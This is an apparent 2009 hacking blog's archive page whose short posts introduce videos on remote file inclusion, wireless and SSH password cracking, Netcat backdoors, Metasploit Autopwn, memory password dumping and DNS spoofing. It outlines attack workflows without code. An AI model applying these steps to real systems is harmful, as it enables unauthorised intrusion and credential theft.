Wednesday, May 27, 2009

PHP Remote File Inclusion




Remote File Inclusion is a technique used to attack websites from a remote computer.RFI allow malicious users to run their own PHP code on a vulnerable website.This allows the attacker to use and run any remote file just by editing the URL. Like a webshell can display the files and folders on the server and can add,edit or delete files and folders,send spams and even get hold of root.

More details on PHP Webshell are here.
Bookmark and Share
Posted by Cybexin at 5/27/2009 06:11:00 AM 0 comments
Labels: , , , , , , ,

Saturday, May 23, 2009

Top Ten Web Hacking Techniques



Top Ten Web Hacking Techniques 2008 by Jeremiah Grossman,Founder & Chief Technology Officer of WhiteHat Security.
Bookmark and Share
Posted by Cybexin at 5/23/2009 03:44:00 AM 0 comments
Labels: , , , , , , ,

Thursday, May 21, 2009

Aircrack-ng



This is a demonstration of hacking wireless access points networks with Aircrack-NG.Before running airodump we need to find an adaptor driver which can be downloaded from the here.

Please note few points regarding wireless as mentioned below -

Channels are the channel your Access Point is Broadcasting on.
ESSID is the Name of your wireless network.
BSSID is the MAC address of your Access Point.

We will have to put the wireless card in monitor mode before capturing the data.Complete step by step documentation can be found here.
Bookmark and Share
Posted by Cybexin at 5/21/2009 12:12:00 AM 0 comments
Labels: , , , , , , ,

Monday, May 18, 2009

SSH Hacking



A Dictionary attack is launched against SSH using a Shell Script to crack Passwords.
Bookmark and Share
Posted by Cybexin at 5/18/2009 05:57:00 AM 3 comments
Labels: , , , , ,

Friday, May 15, 2009

Using NetCat as a Backdoor



In this video a windows RPC exploit is used with the help of Metasploit on Backtrack.After exploiting the RPC vulnerability in windows,hacker uploads Netcat tool to regain access when ever he wants.
Bookmark and Share
Posted by Cybexin at 5/15/2009 05:22:00 AM 0 comments
Labels: , , , , , , ,

Thursday, May 14, 2009

Metasploit Autopwn tool



This Video shows MetaSploit Autopwn tool in action.After identifying a victim's machine using port scanning techniques,Just run the Metasploit framework and connect to sqlite database.Again run a port scan on victim's machine so that the result is saved in the database.Then run the Autopwn tool against the port scan result,Autopwn will automatically run all the exploits against the open port.When the attack completes successfully, we get open sessions. Job Done !!!!

This can also be achived by running Autopwn exploits against the result saved by Nessus in NBE format.
Bookmark and Share
Posted by Cybexin at 5/14/2009 12:57:00 AM 0 comments
Labels: , , , , ,

Wednesday, May 13, 2009

Dump Cleartext Passwords From Windows Memory




This video shows how you can dump the cleartext passwords from a memory dump of a Windows system by using a tool called MDD.
Bookmark and Share
Posted by Cybexin at 5/13/2009 02:07:00 AM 1 comments
Labels: , , , , ,

Monday, May 11, 2009

DNS Spoof Virutal Hosts

DNS Spoofing is a type of MITM attack in which victim's computer is sent a fake DNS reply for a particular website,forcing his machine to visit a different site.But when this Spoofed IP is hosting multiple virtual sites with multiple Host Headers and attacker wants to use this IP as a fake DNS reply for DNS Spoofing then the server will not be able to determine the proper destination as Host Header will be missing in the request.Hence DNS Spoofing attack will not success.

In this video , Ettercap is combined with a C program to change the host header on the fly and submits a new get request to the web server, which allows an attacker to successfully launch DNS Spoofing attack with a IP hosting multiple virtual web sites.

More info can be found here.
Bookmark and Share
Posted by Cybexin at 5/11/2009 02:40:00 AM 0 comments
Labels: , , , ,

Saturday, May 9, 2009

Attacking Oracle with the Metasploit Framework

Bookmark and Share
Posted by Cybexin at 5/09/2009 09:10:00 AM 0 comments
Labels: , , , , ,

Wednesday, May 6, 2009

Auditing Anti-Virus Configuration and Installation with Nessus 3

Bookmark and Share
Posted by Cybexin at 5/06/2009 03:07:00 AM 0 comments
Labels: , , , ,

Tuesday, May 5, 2009

Exploiting XP with SAINT

Bookmark and Share
Posted by Cybexin at 5/05/2009 08:13:00 AM 0 comments
Labels: , , , , , , ,

Monday, May 4, 2009

Exploiting Windows Vista with Core Impact 8

Bookmark and Share
Posted by Cybexin at 5/04/2009 08:51:00 AM 0 comments
Labels: , , , , ,
Subscribe to: Posts (Atom)